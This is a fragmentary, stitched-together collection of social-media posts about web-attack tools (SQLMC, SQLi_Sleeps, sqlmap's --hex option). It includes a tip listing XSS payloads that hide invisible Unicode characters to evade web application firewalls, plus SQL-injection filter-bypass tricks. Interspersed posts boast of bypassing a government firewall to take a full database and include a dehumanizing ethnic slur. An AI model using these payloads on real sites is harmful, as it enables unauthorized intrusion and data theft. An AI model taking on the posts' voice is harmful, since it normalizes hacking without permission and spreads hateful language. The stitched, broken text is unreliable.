SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
Bug Bounty Tip
Bypass XSS WAF protection using invisible separators before or after function name
<script>alert\uFEFF('(1)')</script>
<img/src/onerror= alert&#65279;(1)>
<svg/onload=alert&#8288;(1)>
<img/src/onerror=a&#8203;lert(1)>
<script>alert (1)</script>
In the context of the sqlmap tool, the --hex option is used to convert data to a hexadecimal representation before sending it to the target server. This can be useful in some cases when there is a need to send data encoded in hexadecimal format. For example,
Congratulations, my brother @coffinxp7. I think you deserve more than that. You are a successful person and like to develop yourself. I hope you reach a million followers soon.☺️❤
Features
Web Application Firewall (WAF) detection.
Cross Site Scripting (XSS) tests.
SQL injection time based test.
SQL injection error based test.
Local File Inclusion (LFI) test.
Cross Site Tracing (XST) test.
@coffinxp7
I think they will not respond because they do not care about websites these days because conditions are difficult for them because the Israeli occupation kills thousands of children and women every day. Open the website and you will see the number of dead
Sometimes the mind is stronger than any weapon. One of the mujahideen planted the Palestinian flag in the occupied Palestinian territories, and an Israeli pig came to remove the flag, then came the surprise.
SQLi_Sleeps
It is a simple script for finding SQLi vulnerabilities by means of time-based injection, looking for a response time greater than 20 seconds.
For example, by adding control characters like %00, %0A, etc. or inserting mathematical operations ('AND'1'=1*1 instead of 'AND'1'='1') or adding specific comments like /*!50000%55nIoN*/ /*!50000%53eLeCt*/ and much more.
Bypassed Palestine Government Firewall and WAF, also Forbidden Directory, and got full database
Sorry, brother @coffinxp7, I did not want to interfere in your work, this is just to increase knowledge and curiosity
@MediaZawaya
I communicated with you via email and no one cared. I reported a vulnerability in unauthorized access to databases, bypassing protection systems, and tampering with data.